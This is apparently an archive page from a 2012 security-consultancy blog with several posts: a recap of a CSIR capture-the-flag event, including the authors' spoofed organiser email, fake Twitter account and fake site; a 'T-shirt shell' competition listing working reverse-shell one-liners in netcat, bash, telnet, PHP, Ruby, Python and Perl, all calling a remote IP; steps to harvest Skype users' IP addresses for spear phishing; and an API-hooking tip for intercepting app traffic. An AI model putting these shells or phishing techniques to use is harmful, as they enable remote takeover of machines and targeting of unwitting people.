Grey bar Blue bar
Share this:

Tue, 11 Dec 2012

CSIR Cyber Games

The Council for Scientific and Industrial Research (CSIR) recently hosted the nation Cyber Games Challenge as part of Cyber Security Awareness month. The challenge pit teams of 4-5 members from different institutes against each other in a Capture the Flag style contest. In total there were seven teams, with two teams from Rhodes university, two from the University of Pretoria and three teams from the CSIR.


The games were designed around an attack/defence scenario, where teams would be given identical infrastructure which they could then patch against vulnerabilities and at the same time identify possible attack vectors to use against rival teams. After the initial reconnaissance phase teams were expected to conduct a basic forensic investigation to find 'flags' hidden throughout their systems. These 'flags' were hidden in images, pcap files, alternative data streams and in plain sight.


It was planned that teams would then be given access to a few web servers to attack and deface, gain root, patch and do other fun things to. Once this phase was complete the system would be opened up and the 'free-for-all' phase would see teams attacking each others systems. Teams would lose points for each service that was rendered inaccessible. Unfortunately due to technical difficulties the competition did not go as smoothly as initially planned. Once the games started the main website was rendered unusable almost immediately due to teams DirBuster to enumerate the competition scoring system. The offending teams were asked to cease their actions and the games proceeding from there. Two teams were disqualified after not ceasing their attacks on official infrastructure. Once teams tried to access their virtual infrastructure new problems arose, with only the two teams from Rhodes being able to access the ESX server while the rest of the teams based at the CSIR had no connectivity. This was rectified, at a cost, resulting in all teams except for the two Rhodes teams having access to their infrastructure. After a few hours of struggle it was decided to scrap the attack/defence part of the challenge. Teams were awarded points for finding hidden flags, with the most basic flag involving 'decoding' a morse-code pattern or a phrase 'encrypted' using a quadratic equation. It was unfortunate that the virtual infrastructure did not work as planned as this was to be the main focus of the games and sadly without it many teams were left with very little to do in the time between new 'flag' challenges being released.


In the days prior to the challenge our team, team Blitzkrieg, decided to conduct a social engineering exercise. We expected this to add to the spirit of the games and to introduce a little friendly rivalry between the teams prior to the games commencing. A quick google search for "CSIR Cyber Games" revealed a misconfigured cyber games server that had been left exposed on a public interface. Scrapping this page for information allowed us to create a fake Cyber Games site. A fake Twitter account was created on behalf of the CSIR Cyber Games organisers and used to tweet little titbits of disinformation. Once we had set-up our fake site and twitter account, a spoofed email in the name of the games organiser was sent out to all the team captains. Teams were invited to follow our fake user on twitter and to register on our cyber games page. Unfortunately this exercise did not go down too well with the games organisers and our team was threatened with disqualification or starting the games on negative points. In hindsight we should have run this by the organisers first to insure that it was within scope. After the incident we engaged with the organisers to explain our position and intentions, they were very understanding and decided to not disqualify us and waver any point based penalty. As part of our apology, we agreed to submit a few challenges for next years Cyber Games.


Overall we believe concept of using structured Cyber Games to promote security awareness is both fun and useful. While the games were hampered by network issues there was enough content available to make for an entertaining and exciting afternoon. The rush of solving challenges as fast as possible and everyone communicating ideas made for an epic day. In closing, the CSIR Cyber Games was a success, as with all things we believe it will improve over time and provide a good platform to promote security awareness.


For the defacement phase of the games we made a old school defacement page.

T-Shirt Shell Competition

For our internal hackathon, we wanted to produce some shirts. We ran a competition to see who could produce a reverse shell invocation most worthy of inclusion on a shirt. Here are the submissions, which may be instructive or useful. But first; the winning t-shirt design goes to Vlad (-islav, baby don't hurt me, don't hurt me, no more):



Funny story; the printer left out the decimal points between the IP, so we had to use a permanent marker to put them back. Oh, also, many of these were originally taken from somewhere else then modified, we don't claim the full idea as our own. Anyway, onto the shells!

Netcat — 18 chars


nc -e sh 1.0.0.1 1


Requires nc with -e support (unlikely to be on remote box by default).

Bash — 27 chars


sh>&/dev/tcp/1.0.0.1/8 0>&1


Requires bash with /dev/tcp support, not always there (e.g. RHEL). Vlad's winning contribution.

Telnet — 37 chars


mkfifo x&&telnet 1.0.0.1 8 0<x|sh 1>x


Will work on most systems, can replace telnet with nc to get 33 chars.

PHP — 56 chars


<?php $s=fsockopen("1.0.0.1",8);exec("sh<&3>&3 2>&3");?>


Requires PHP CLI. This one from Rogan.

Ruby — 73 chars


f=TCPSocket.open("1.0.0.1",8).to_i
exec sprintf("sh<&%d>&%d 2>&%d",f,f,f)


Need to invoke this with

ruby -rsocket small-rev.rb


which is a bit of a cheat for size. This was also taken from pentestmonkey

Python — 155 chars


import socket as x,os
s=x.socket(2,1)
s.connect(("1.0.0.1",8))
d=os.dup2
f=s.fileno()
d(f,0)
d(f,1)
os.system("sh")

This assumes you use unix line breaks. My personal favourite.

Perl - 121 chars


$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"1.0.0.1:8");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;

Invoke with
perl -MIO small-rev.pl

Elf - 133 chars


ELF??????????????T€4???????????4? ????????????????€?€ ??? ?????????1ÛSCSjjfX‰áÍ€—[h??fh fS‰ájfXPQW‰áCÍ€[™ 

[more]

Wed, 28 Nov 2012

Brad the Nurse

Organising our yearly training event at Blackhat in Las Vegas is no mean feat. With well over two hundred students to prepare for, the size of Caesars Palace to contend with (last year, we, on average, walked 35 kilometers in distance just inside the hotel) and the manic environment, it's a stressful environment.

There are many Blackhat helpers running about, but none like Mr Brad 'the Nurse' Smith. Brad would always be there popping his head into our rooms, making sure us plakkers had what we needed, when we needed it and always with that trademark smile. Armed with his two-way radios (almost like a western gun-slinger in the way he was able to whip them off and put them into action in seconds), he knew who to call and where to get it. This video from Toolswatch, shot at his last Blackhat, summed up his enthusiasm:

Needless to say, our Blackhat Las Vegas experience was often made possible with a few key individuals helping us and Brad was one of them. A rather apt quote from Gert was:

He is the guy that got shit sorted *full stop*
Brad's health has suffered in recent years and he missed Blackhat this year, due to a stroke. No more gunslinger walking the corridors and his absence was notable. Brad's health has since deteriorated after having surgery on his skull and Nina's recently made the hard decision to have all medications stopped and feeding tube turned off with the exception of pain medications as needed.

Our thoughts are with Brad's family and Nina right now in this hard hour. Brad, you will be missed by the crazy South Africans (and other nationalities!) at SensePost. Thanks for all your help over the past many years.

Mon, 26 Nov 2012

Skype Passive IP Disclosure Vulnerability

When performing spear phishing attacks, the more information you have at your disposal, the better. One tactic we thought useful was this Skype security flaw disclosed in the early days of 2012 (discovered by one of the Skype engineers much earlier).

For those who haven't heard of it - this vulnerability allows an attacker to passively disclose victims external, as well as internal, IP addresses in a matter of seconds, by viewing the victims VCard through an 'Add Contact' form.

Why is this useful?

1. Verifying the identity and the location of the target contact. Great when performing geo-targeted phishing attacks.

2. Checking whether your Skype account has not been used elsewhere :)

3. Spear phishing enumeration while Pen Testing.

4. Just out of plain curiosity.

To get this working, following these basic steps:

1. Download and install the patched version of Skype 5.5 from here (the patch enables the Skype client to save the logs in non obfuscated form)

2. Save the lines below as a Skype_log_patch.reg reg file:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Skype\Phone\UI\General]
"LastLanguage"="en"
"Logging"="SkypeDebug2003"
"Logging2"="on"
Once saved, run it to enable the Skype Debug Log File.

4. Start Skype.

5. Search for any Skype contact and click on the 'Add a Skype Contact' button, but do not send the request, rather click on the user to view their VCard.

4. Open the log file (it should appear in the same folder as Skype executable e.g. debug-20121003-0150)

5. Look for the PresenceManager line - you should see something similar to this - >

In the above image you can spot my Skype name, external as well as internal IP addresses.

The log will include similar credentilas for everyone listed as a "contact" under your Skype account, as well as many other fresh, genuine and useful information received directly from your local Skype tracker.

Tue, 20 Nov 2012

HTTPS <=(:)=> via WinAPI

Hijacking SSL sessions initiated by the browser is a trivial task. The challenge comes when trying to intercept SSL traffic in applications such as Dropbox or Easynote. These apps create additional measures to verify certificates and their integrity, hence not very friendly to perform with Burp.

One quick solution to the above problem is hiding one level above (or below :) the OSI layer. Live API monitoring // hooking can be used to capture and manipulate HTTP/S "traffic" before it being placed on the wire, more or less the same way are used to doing it in Burp.

One great tool is the Rohitab API Monitor, which allows you to monitor, and control, API calls made by applications and services.

Steps: Attach to a target process in realtime -> selectively monitor/hook its API -> place breakpoints and manipulate API call parameter content at will.

Fig 1 - Attaching to evernote.exe | Selecting Internet (HTTP Srv API, WEbDav, WinNet etc...) API as primary filter for the session.

Fig2 - Examining HttpSendRequestA call (contains my easynote creds :) ) in realtime, before the assembled POST request leaves the host.

P.S. That isn't my password.